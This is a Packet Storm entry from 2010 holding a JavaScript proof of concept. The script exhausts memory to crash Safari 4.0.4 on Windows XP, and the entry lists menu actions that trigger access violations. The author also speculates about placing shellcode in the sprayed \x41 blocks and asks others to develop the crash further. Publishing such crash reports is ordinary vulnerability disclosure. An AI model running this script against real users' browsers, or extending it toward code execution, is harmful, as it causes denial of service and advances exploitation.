ID PACKETSTORM:85613 Type packetstorm Reporter systemx00 Modified 2010-01-26T00:00:00
Description
`The following piece of JavaScript will crash Safari nicely when triggered using one of the methods described below. With my limited knowledge I am unable to tell if it's exploitable or not. I therefore turn it over to "the internet". (Tested on Safari 4.0.4, Win XP Pro SP3.)
============================
<script>
// Double the string until it is 0x40000 (262144) characters long.
var data = "A";
while (data.length < 0x40000) {
    data += data;
}
// Fill an array with 4000 concatenations of data+data (0x80000 characters each).
var data2 = new Array();
for (var x = 0; x < 4000; x++) {
    data2[x] = data + data;
}
</script>
============================
The crash is not immediate, but there are actually two ways to trigger it and I believe they are separate problems.
The following will cause Safari to crash with "Access violation reading [00000000]":
* Window->Activity
Whereas these will crash Safari with "Access violation writing to [BBADBEEF]":
* Develop->Start Debugging JavaScript
* Develop->Show Error Console (Unreliable)
* Develop->Show Web Inspector (Unreliable)
* (Right Click)->Inspect Element
I can't seem to affect any registers in an advantageous way, but I do see several pointers to \x41 blocks on the stack. At least you could put shellcode in these and jump to them if you could control EIP. If anyone is able to do anything with this, please let me know.
`
Title Safari 4.0.4 Crash Proof Of Concept Published 2010-01-26T00:00:00 Href https://packetstormsecurity.com/files/85613/Safari-4.0.4-Crash-Proof-Of-Concept.html Source https://packetstormsecurity.com/files/download/85613/safari404-dos.txt